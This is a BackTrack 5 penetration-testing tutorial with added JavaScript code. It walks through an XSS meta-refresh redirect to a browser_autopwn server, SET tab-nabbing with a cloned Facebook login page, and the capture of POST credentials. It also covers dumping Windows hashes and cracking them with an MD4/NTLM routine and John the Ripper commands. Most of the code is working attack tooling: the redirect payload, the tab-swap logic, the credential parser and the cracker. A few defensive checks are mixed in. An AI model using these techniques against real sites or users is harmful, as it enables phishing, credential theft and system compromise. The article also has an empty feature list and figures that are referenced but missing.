BackTrack 5 Tutorial 2 PDF
Metasploit Armitage
Armitage is a graphical front end for the Metasploit Framework: the exploits, payloads and sessions underneath are Metasploit's own. We did an entire series of Metasploit tutorials on this site last month. In this part of the BackTrack 5 guide, we will look at the browser autopwn attack (Metasploit's browser_autopwn module, which serves a battery of client-side exploits to any browser that visits it) against a Windows XP client, driven from Armitage.
Features of this attack:
1.
2.
3.
4.
For this exploit, you need a site with a reflected cross-site scripting (XSS) vulnerability that can be used for URL redirection. The victim clicks a crafted link to the trusted site; the injected markup redirects the browser to the attacker's browser_autopwn server, which fires its exploits at the browser and, on success, spawns a Meterpreter shell on the victim's system. The URL redirection code looks something like:
    http://vulnerablesite?c="><meta HTTP-EQUIV="REFRESH" content="0; url=http://attackerIPaddress">
Figure 2: An illustration of URL redirection from an XSS vulnerable site, xyz.com, to 192.168.13.132
The auto-migration feature moves the Meterpreter payload out of the browser and into a new process as soon as the session opens. Without it, the session lives inside the browser process, so the whole attack ends when the user closes the browser (or the exploit crashes it). Migration is therefore done automatically to maintain prolonged access.
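As an added illustration, not code from the original article or from Metasploit, the following JavaScript shows both ends of the redirection trick described above: how the crafted link is assembled, and how a defender can pull injected meta-refresh redirects out of web-server logs. The host names (xyz.com, 192.168.13.132 as in Figure 2), the parameter name and the log lines are constructed for the example; the browser_autopwn listener at the attacker's address is not modelled.

```javascript
// Added example: the XSS meta-refresh redirect from the text, attacker side and
// defender side. All hosts, parameter names and log lines are constructed.

// Attacker side: build the link. The payload closes the attribute and tag that
// the reflected parameter lands in, then adds a 0-second refresh to the host
// running browser_autopwn (192.168.13.132 here, as in Figure 2).
function buildRedirectUrl(vulnerableBase, param, attackerUrl) {
  const payload = `"><meta http-equiv="refresh" content="0; url=${attackerUrl}">`;
  return `${vulnerableBase}?${param}=${encodeURIComponent(payload)}`;
}

// Defender side: a request URL whose query carries a meta refresh pointing at a
// host other than the site itself is an XSS redirect attempt. Returns the
// off-site target, or null when nothing injected is found.
const META_REFRESH =
  /<meta[^>]*http-equiv\s*=\s*["']?refresh["']?[^>]*content\s*=\s*["']?\s*\d+\s*;\s*url=([^"'>\s]+)/i;

function findInjectedRedirect(requestUrl) {
  const url = new URL(requestUrl); // searchParams percent-decodes the values
  for (const value of url.searchParams.values()) {
    const m = META_REFRESH.exec(value);
    if (!m) continue;
    let target;
    try { target = new URL(m[1]); } catch (e) { continue; } // relative: stays on site
    if (target.host !== url.host) return target.href;
  }
  return null;
}

// Run the check over access-log lines (combined log format).
function scanLog(lines, siteOrigin) {
  const hits = [];
  for (const line of lines) {
    const req = /"(?:GET|POST) (\S+) HTTP\//.exec(line);
    if (!req) continue;
    const target = findInjectedRedirect(siteOrigin + req[1]);
    if (target) hits.push({ client: line.split(' ')[0], target });
  }
  return hits;
}

// Constructed log lines: one ordinary search, one carrying the injected redirect.
const SAMPLE_LOG = [
  '10.0.0.5 - - [10/Oct/2011:13:55:36 +0530] "GET /search?q=backtrack HTTP/1.1" 200 512',
  '10.0.0.9 - - [10/Oct/2011:13:56:01 +0530] "GET /page?c=%22%3E%3Cmeta%20http-equiv%3D%22refresh%22%20content%3D%220%3B%20url%3Dhttp%3A%2F%2F192.168.13.132%2F%22%3E HTTP/1.1" 200 512',
];
```

The defender check keys on the destination host rather than on the string "meta", so a legitimate same-site refresh is ignored while any injected redirect to an outside address is reported with the client IP that sent it. The corresponding fix on the vulnerable site is output encoding of the reflected parameter, which turns the `"><meta ...>` payload into inert text.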
Social-Engineer Toolkit
The Social-Engineer Toolkit (SET) has been covered extensively in my previous article on this site. In this BackTrack 5 guide, I will discuss a type of attack called tab nabbing. In this attack, the victim opens a link in a browser; as soon as he switches to another tab, the original page is replaced with a fake login page, and the victim is duped into entering his username and password on it, which hands the login credentials to the attacker.
http://searchsecurity.techtarget.in/tip/BackTrack-5-Guide-II-Exploitation-tools-and-frameworks
In this social engineering attack, we choose the website attack vector and then the option to clone a website. We specify the site to clone, that is, the site whose login credentials we want to obtain. I have cloned Facebook in this BackTrack 5 guide for demonstration purposes only*. Please note that cloning requires an Internet connection: SET fetches the live page to build its copy, so the clone is not created if you are offline during the process.
Figure 3 of this guide shows the fake Facebook login page, and Figure 4 shows the POST data captured by SET. The method extends to any URL the attacker intends to clone: whatever fields the cloned form submits by POST are captured, whether the original site is served over HTTP or HTTPS. SET supports both protocols, and since the victim's browser is talking to SET's web server rather than to the real site, the real site's TLS does nothing to protect the credentials; SET effectively harvests them.
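The tab-nabbing swap and the credential capture, as an added example in JavaScript rather than SET's own code: the first part is the page-side logic (swap only once, and only after the tab has lost focus), written against an injected window and document so it can be exercised without a browser; the second part parses a captured login POST body of the kind shown in Figure 4. The clone URL, the form field names (`email`, `pass`) and the captured body are placeholders.

```javascript
// Added example of the tab-nabbing technique and of POST-data capture.
// Illustrative only: not SET's implementation.

// Assumed location of the cloned login page served by the attacker's SET host.
const CLONE_URL = 'http://192.168.13.132/login.html';

// Page-side logic: arm a visibilitychange handler that replaces the page with the
// clone the first time the tab is hidden. `win` and `doc` are injected so the
// logic can run outside a browser; in a real page they are window and document.
function armTabNabber(win, doc, cloneUrl) {
  let swapped = false;
  const handler = () => {
    if (swapped || doc.visibilityState !== 'hidden') return;
    swapped = true;
    // The tab is in the background, so the user does not see the reload happen.
    win.location.replace(cloneUrl);
  };
  doc.addEventListener('visibilitychange', handler);
  return { hasSwapped: () => swapped };
}

// Minimal stand-in for a browser tab, enough to drive the handler above.
function fakeTab(startUrl) {
  const listeners = {};
  const doc = {
    visibilityState: 'visible',
    addEventListener: (name, fn) => { listeners[name] = fn; },
  };
  const win = { location: { href: startUrl, replace(url) { this.href = url; } } };
  return {
    win,
    doc,
    switchAway() { doc.visibilityState = 'hidden'; listeners.visibilitychange(); },
  };
}

// Server side: SET logs the raw POST body the cloned form submits. Parse it into
// name/value pairs and pick out the credential fields. The field names are
// whatever the cloned form uses; 'email' and 'pass' are assumed here.
function parseCapturedPost(body, credentialFields = ['email', 'pass']) {
  const params = new URLSearchParams(body);
  const all = Object.fromEntries(params.entries());
  const creds = {};
  for (const f of credentialFields) if (params.has(f)) creds[f] = params.get(f);
  return { all, creds };
}

// Constructed capture, in the shape of the POST data in Figure 4.
const SAMPLE_POST = 'lsd=AVq1&email=victim%40example.com&pass=S3cret%21&login=Log+In';

// The user-side check that defeats the trick: before typing a password, the
// address-bar host must still be the site that was opened.
function onExpectedHost(href, expectedHost) {
  return new URL(href).host === expectedHost;
}
```

The swap is keyed on the tab becoming hidden rather than on a timer, which is what makes the attack convincing: the page the victim left looked harmless, and the login page appears only after they have looked away. `onExpectedHost` is the whole defence from the user's side; the clone lives on the attacker's host, and no amount of visual fidelity changes the address bar.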
Figure 3: A fake Facebook login page created by the Social Engineer Toolkit based on options set by
the attacker
Figure 4: POST Data captured by the Social Engineer Toolkit framework from a fake Facebook login
page
As seen in Figure 5 of this BackTrack 5 guide, BackTrack 5 offers four classes of privilege escalation tools, each covering a specialized area.
The remote system examined in this BackTrack 5 guide uses the set of usernames and passwords shown in Figure 7, as recovered by John the Ripper from the hashes dumped in Figure 6.
Figure 6: The output of hashdump in the Meterpreter shell, which is copied to a text file and supplied to John the Ripper for cracking.
With these passwords in hand, we can now escalate our privileges on the target system. Note that hashdump itself already needs SYSTEM-level access on the host it runs on, so the cracked passwords pay off mainly elsewhere: logging on as those users on other machines where the same passwords are reused, and regaining access to this one later without re-exploiting it.
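What John does with the Figure 6 output, reduced to an added example in JavaScript (not John the Ripper's or Metasploit's code): parse pwdump-style hashdump lines, flag accounts whose LM column is the well-known "no LM hash" value and whose NTLM column is the hash of the empty password, and test candidate passwords by computing NTLM (MD4 over the UTF-16LE encoding of the password) ourselves. The hashdump lines and the candidate list are constructed; the two marker constants and the MD4 algorithm (RFC 1320) are standard.

```javascript
// Added example: parsing hashdump output and verifying candidate passwords
// against the NTLM column. Not John the Ripper's or Metasploit's code.

// Well-known marker values (standard, not constructed):
const EMPTY_LM = 'aad3b435b51404eeaad3b435b51404ee'; // LM hash of "" => LM hashes not stored
const EMPTY_NT = '31d6cfe0d16ae931b73c59d7e0c089c0'; // NTLM hash of the empty password

// Constructed hashdump lines in the format of Figure 6 (user:RID:LM:NTLM:::).
const SAMPLE_HASHDUMP = [
  'Administrator:500:aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c:::',
  'Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::',
  'victim:1003:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::',
].join('\n');

function parseHashdump(text) {
  return text.split('\n').filter((l) => l.trim()).map((line) => {
    const [user, rid, lm, nt] = line.split(':');
    const entry = { user, rid: Number(rid), lm: lm.toLowerCase(), nt: nt.toLowerCase() };
    entry.lmStored = entry.lm !== EMPTY_LM;      // LM present: far weaker, crack it first
    entry.emptyPassword = entry.nt === EMPTY_NT; // blank password, nothing to crack
    return entry;
  });
}

// MD4 (RFC 1320) over a byte array, hex output. NTLM = MD4(UTF-16LE(password)).
function md4(bytes) {
  const len = bytes.length;
  const padded = ((len + 8) >> 6) * 64 + 64; // room for 0x80 and the 64-bit length
  const buf = new Uint8Array(padded);
  buf.set(bytes);
  buf[len] = 0x80;
  const view = new DataView(buf.buffer);
  view.setUint32(padded - 8, len * 8, true); // bit length, low word (inputs < 512 MiB)
  const rotl = (x, s) => ((x << s) | (x >>> (32 - s))) >>> 0;
  const F = (x, y, z) => (x & y) | (~x & z);
  const G = (x, y, z) => (x & y) | (x & z) | (y & z);
  const H = (x, y, z) => x ^ y ^ z;
  const K1 = [...Array(16).keys()];
  const K2 = [0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15];
  const K3 = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15];
  let h = [0x67452301, 0xefcdab89, 0x98badcfe, 0x10325476];
  for (let off = 0; off < padded; off += 64) {
    const X = Array.from({ length: 16 }, (_, i) => view.getUint32(off + i * 4, true));
    const st = h.slice();
    const round = (fn, k, s, add) => {
      for (let i = 0; i < 16; i++) {
        const t = (4 - (i % 4)) % 4; // register updated this step: a, d, c, b, ...
        const x = st[t], y = st[(t + 1) % 4], z = st[(t + 2) % 4], w = st[(t + 3) % 4];
        st[t] = rotl((x + fn(y, z, w) + X[k[i]] + add) >>> 0, s[i % 4]);
      }
    };
    round(F, K1, [3, 7, 11, 19], 0);
    round(G, K2, [3, 5, 9, 13], 0x5a827999);
    round(H, K3, [3, 9, 11, 15], 0x6ed9eba1);
    h = h.map((v, i) => (v + st[i]) >>> 0);
  }
  const out = new DataView(new ArrayBuffer(16));
  h.forEach((v, i) => out.setUint32(i * 4, v, true));
  return Buffer.from(out.buffer).toString('hex');
}

function ntlmHash(password) {
  return md4(Buffer.from(password, 'utf16le'));
}

// The comparison John performs at scale: hash each candidate once and match it
// against every account. Returns { username: password } for the hits.
function crackWith(entries, candidates) {
  const found = {};
  for (const pw of candidates) {
    const h = ntlmHash(pw);
    for (const e of entries) if (e.nt === h) found[e.user] = pw;
  }
  return found;
}
```

John reads these lines as they come out of hashdump: `john --format=NT hashes.txt` attacks the NTLM column, and `--format=LM` the LM column when it is present. The `lmStored` flag is the thing to look at first: LM hashes are case-insensitive and computed over two independent 7-character halves, so an account that still stores one is cracked far faster than the same password via NTLM. Unsalted NTLM is also why a single hash computation serves every account in the dump.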
In the protocol analysis category, we have Wireshark, a top-class network traffic analyzer. I have covered the various applications of Wireshark in an earlier guide.
It is evident from this guide that BackTrack 5 has evolved a lot in terms of its arsenal. A crafty attacker can make full use of these tools and combine them, as the XSS redirect, browser autopwn and hashdump steps above chain together, to maximize the gains from a single foothold. This BackTrack 5 guide highlights the most important exploitation and privilege escalation tools. In the BackTrack 5 guides to come, I will cover some more exploitation and privilege escalation techniques.
Head to the third part of this BackTrack 5 tutorial to learn more about exploitation
frameworks.